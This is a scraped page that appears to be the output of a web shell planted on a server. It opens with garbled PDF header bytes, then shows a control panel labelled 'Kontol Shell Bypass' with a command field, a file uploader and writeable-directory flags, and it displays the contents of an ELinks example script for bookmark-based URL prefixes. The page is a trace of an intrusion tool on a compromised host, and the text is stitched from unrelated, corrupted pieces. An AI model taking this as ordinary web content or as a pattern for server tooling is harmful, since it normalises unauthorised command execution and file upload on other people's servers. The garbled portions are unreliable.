%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/doc/elinks-data/examples/smjs/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/doc/elinks-data/examples/smjs/smartprefixes_bookmarks.js
/* Modern, bookmark-based smartprefixes */

var loaded_smartprefixes_common_code;
if (!loaded_smartprefixes_common_code) {
	do_file(elinks.home + "smartprefixes_common.js");
	loaded_smartprefixes_common_code = 1;
}

/* Create a top-level folder titled "smartprefixes". In it, add a bookmark
 * for each smartprefix, putting the keyword in the title and either a normal
 * URI or some JavaScript code prefixed with "javascript:" as the URI. When you
 * enter the keyword in the Go to URL box, ELinks will take the URI
 * of the corresponding bookmark, replace any occurrence of "%s" with the rest
 * of the text entered in the Go to URL box, evaluate the code if the URI
 * starts with "javascript:", and go to the resulting URI.
 */
function rewrite_uri(uri) {
	if (!elinks.bookmarks.smartprefixes) return uri;

	var parts = uri.split(" ");
	var prefix = parts[0];

	if (!elinks.bookmarks.smartprefixes.children[prefix]) return uri;

	var rule = elinks.bookmarks.smartprefixes.children[prefix].url;
	var rest = parts.slice(1).join(" ");

	if (rule.match(/^javascript:/))
		return eval(rule
		             .replace(/^javascript:/, "")
		             .replace(/%s/, rest));

	return rule.replace(/%s/, escape(rest));
}
elinks.goto_url_hooks.push(rewrite_uri);

Kontol Shell Bypass